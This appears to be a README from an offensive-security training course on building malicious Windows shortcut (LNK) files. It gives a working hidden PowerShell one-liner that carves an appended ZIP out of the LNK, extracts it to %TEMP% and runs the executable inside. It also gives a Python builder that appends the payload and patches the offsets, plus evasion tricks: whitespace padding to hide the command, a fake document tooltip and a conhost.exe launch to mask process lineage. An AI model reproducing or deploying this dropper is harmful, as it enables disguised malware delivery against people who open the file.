## embed-zip LNK

### Generate your own LNK

1. Create a ZIP archive (`updater.zip`) containing the executable to run, here `updater.exe`
2. Produce the LNK, with the ZIP appended and the offsets patched, with:

```
cmd> gen-embed-zip.exe updater.zip updater.lnk
```

### How it works

The `embed-zip` approach works as follows:

1. Create an LNK pointing at `C:\Windows\System32\cmd.exe` with the following arguments (the example shipped with the training runs SysInternals Autoruns64):

```
/c powershell -windowstyle hidden $nagenciesp = dir *.lnk ^| ? {$_.length -eq 00391272} ^| select -ExpandProperty FullName;$utulsag = [system.io.file]::ReadAllBytes($nagenciesp);$rbanx = '%TEMP%\tmp' + (Get-Random) + '.zip';$rbanx = [Environment]::ExpandEnvironmentVariables($rbanx);$xsmilek = [System.IO.Path]::GetDirectoryName($rbanx);[System.IO.File]::WriteAllBytes($rbanx, $utulsag[  3186..($utulsag.length)]);cd $xsmilek;Expand-Archive -Path $rbanx -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;del -Path $rbanx -EA SilentlyContinue -Force ^| Out-Null;^& .\Autoruns64.exe
```

   The one-liner finds the LNK by its exact file size among the `*.lnk` files in the working directory (so it relies on that directory being the folder the LNK sits in), reads its own bytes, writes everything from the ZIP offset onwards to a randomly named `%TEMP%\tmp<random>.zip`, expands the archive in `%TEMP%`, deletes the archive and runs the extracted executable. The `^|` and `^&` are cmd.exe escapes so that the pipe and call operator reach PowerShell intact instead of being interpreted by cmd.

2. Create a ZIP archive containing SysInternals `Autoruns64.exe`
3. Append that ZIP to the LNK file
4. Patch two fields of the command line in place. Both are padded to a fixed width (leading zeros, leading spaces) so that overwriting them never changes the length of the LNK, which would otherwise invalidate the size check written in step 4a:
  - `{$_.length -eq 00391272}`: the zero-padded size of the LNK file _after_ the ZIP has been appended
  - `$utulsag[  3186..($utulsag.length)]`: the space-padded offset of the very first ZIP byte (`50 4B | PK`), i.e. the length of the LNK before the ZIP was appended
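The embedding and patching steps (3 and 4) together with the stager's carve step, as an added example written for this page; it is not the `gen-embed-zip.exe` tool nor any code from the training. The `build_lnk_stub`, `embed_zip`, `carve_zip` and `stager_still_finds_lnk` functions, the shortened command line and the "LNK" itself are constructed stand-ins (a 0x4C-byte header plus a length-prefixed UTF-16LE command line, not a complete Shell Link structure), and the ZIP holds a dummy `Autoruns64.exe`, not the real binary. It writes both fields at their padded width, verifies that the first `PK` lands where the offset field says, and shows that growing the file by a single byte afterwards breaks the size-based lookup.

```python
"""Append a ZIP to an LNK stand-in, patch the two fixed-width fields of the
embedded PowerShell one-liner in place, then carve the ZIP back out the way
the stager does.  Constructed example, not the gen-embed-zip.exe tool."""
import io
import struct
import uuid
import zipfile

U16 = "utf-16-le"          # LNK StringData is stored as UTF-16LE
SIZE_WIDTH = 8             # "-eq 00391272": 8 zero-padded digits
OFFSET_WIDTH = 6           # "[  3186..": 6 characters, right-justified with spaces
SIZE_MARKER = "-eq "
OFFSET_MARKER = "$utulsag["
ZIP_MAGIC = b"PK\x03\x04"  # local file header signature; its first two bytes are 50 4B

# Shortened form of the page's command line with both fields at placeholder
# values; only the parts relevant to the patching step are kept verbatim.
CMDLINE = (
    "/c powershell -windowstyle hidden $nagenciesp = dir *.lnk ^| "
    "? {$_.length -eq 00000000} ^| select -ExpandProperty FullName;"
    "$utulsag = [system.io.file]::ReadAllBytes($nagenciesp);"
    "[System.IO.File]::WriteAllBytes($rbanx, $utulsag[     0..($utulsag.length)]);"
    "^& .\\Autoruns64.exe"
)


def build_lnk_stub(cmdline: str) -> bytes:
    """Constructed stand-in (assumption, not a full Shell Link): 0x4C-byte header
    with HeaderSize and LinkCLSID, remaining fields zeroed, followed by a
    COMMAND_LINE_ARGUMENTS-style string (2-byte char count + UTF-16LE text)."""
    header = struct.pack("<I", 0x4C) + uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
    header = header.ljust(0x4C, b"\x00")
    return header + struct.pack("<H", len(cmdline)) + cmdline.encode(U16)


def _field_span(data: bytes, marker: str, width: int) -> tuple[int, int]:
    """Byte range of the fixed-width field that follows `marker` in the UTF-16LE text."""
    needle = marker.encode(U16)
    pos = data.find(needle)
    if pos < 0:
        raise ValueError(f"marker {marker!r} not found in command line")
    start = pos + len(needle)
    return start, start + width * 2


def read_field(data: bytes, marker: str, width: int) -> str:
    start, end = _field_span(data, marker, width)
    return data[start:end].decode(U16)


def patch_field(data: bytes, marker: str, width: int, value: str) -> bytes:
    """Overwrite the field in place; the file length must not change."""
    if len(value) != width:
        raise ValueError(f"{value!r} does not fit the {width}-character field")
    start, end = _field_span(data, marker, width)
    return data[:start] + value.encode(U16) + data[end:]


def embed_zip(lnk: bytes, zip_bytes: bytes) -> bytes:
    """Step 3 and 4: append the ZIP, then patch size and offset to match."""
    if not zip_bytes.startswith(ZIP_MAGIC):
        raise ValueError("payload does not start with a ZIP local file header")
    zip_offset = len(lnk)                      # first 'PK' byte sits right after the LNK
    total = len(lnk) + len(zip_bytes)          # size the stager will look for
    size_field = f"{total:0{SIZE_WIDTH}d}"     # leading zeros keep the width
    offset_field = f"{zip_offset:>{OFFSET_WIDTH}d}"  # leading spaces keep the width
    out = patch_field(lnk, SIZE_MARKER, SIZE_WIDTH, size_field)
    out = patch_field(out, OFFSET_MARKER, OFFSET_WIDTH, offset_field)
    return out + zip_bytes


def carve_zip(blob: bytes) -> bytes:
    """What the one-liner does at runtime: check the exact length, then slice
    from the offset field to the end of the file."""
    if len(blob) != int(read_field(blob, SIZE_MARKER, SIZE_WIDTH)):
        raise ValueError("size check failed: the stager would not find its own LNK")
    offset = int(read_field(blob, OFFSET_MARKER, OFFSET_WIDTH))
    if blob[offset:offset + 4] != ZIP_MAGIC:
        raise ValueError("offset field does not point at a ZIP local file header")
    return blob[offset:]


def stager_still_finds_lnk(blob: bytes) -> bool:
    """True if the size-keyed lookup still matches; any later rewrite that
    changes the LNK length, even by one byte, makes this return False."""
    try:
        carve_zip(blob)
        return True
    except ValueError:
        return False


def build_demo() -> dict:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Autoruns64.exe", b"MZ" + b"\x00" * 64)  # constructed dummy, not the real binary
    lnk = build_lnk_stub(CMDLINE)
    blob = embed_zip(lnk, buf.getvalue())
    with zipfile.ZipFile(io.BytesIO(carve_zip(blob))) as zf:
        names = zf.namelist()
    return {
        "lnk_len": len(lnk),
        "total_len": len(blob),
        "size_field": read_field(blob, SIZE_MARKER, SIZE_WIDTH),
        "offset_field": read_field(blob, OFFSET_MARKER, OFFSET_WIDTH),
        "first_pk": blob.find(ZIP_MAGIC),
        "names": names,
        "intact_ok": stager_still_finds_lnk(blob),
        "grown_by_one_byte_ok": stager_still_finds_lnk(blob + b"\x00"),
    }


if __name__ == "__main__":
    print(build_demo())
```

The width checks in `patch_field` are the point of the exercise: a payload whose combined size needs more than 8 digits, or an LNK longer than 6 characters of offset, cannot be expressed without changing the length of the command line, and a changed length moves every byte after it. The last entry of `build_demo` shows the flip side for the defender or the tester: anything that rewrites the LNK afterwards (re-saving it, a tool adding a comment) breaks the size filter and the stager silently runs nothing.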


### Evasion + LOLBIN

To make the LNK a little stealthier and lower its detection odds, three tricks can be combined:

1. Prepend the command line with 512 spaces, so that the Target field in Explorer's Properties window shows only blanks and the actual command is pushed out of view
2. Add the following LNK comment, which Explorer shows in the hover tooltip and which makes the file look like an ordinary document:

```
Type: Document
Size: 626.35 KB
Date modified: 2022-10-12
```

   (mind the `\n` after each line: the comment must contain real LineFeed bytes in the binary LNK structure, not the two literal characters `\n`)

3. Run CMD through a LOLBIN so that cmd.exe is not a direct child of explorer.exe, for example conhost.exe, which launches the trailing command it is given:

```
C:\Windows\System32\conhost.exe conhost conhost conhost conhost conhost conhost cmd /c notepad
```

## Copyrights

> 
> Copyright (C) Binary-Offensive.com Mariusz Banach - All Rights Reserved
> Unauthorized copying of this file, via any medium is strictly prohibited.
>
> This file/directory was part of Modern Initial Access and Evasion Tactics training
> delivered by binary-offensive.com and was provided as supplemental material.
> 
> Authored by Mariusz Banach <mb@binary-offensive.com>, @mariuszbit / mgeeky
> 
